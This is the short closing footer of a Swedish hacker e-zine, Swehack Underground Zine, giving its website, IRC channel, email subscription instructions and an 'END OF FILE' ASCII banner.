http://www.hackers-se.com/ \__/(_)____(_)____(_) IRC: #Swehack @ DALnet Börja att prenumerera på Swehack Underground Zine genom att skicka ett e-mail med Subscribe som ämne (subject) till suz@linux.nu ____________________________________________________________________________ ____________________________________________________________________________ =========E====N====D============O=====F============F====I====L====E=========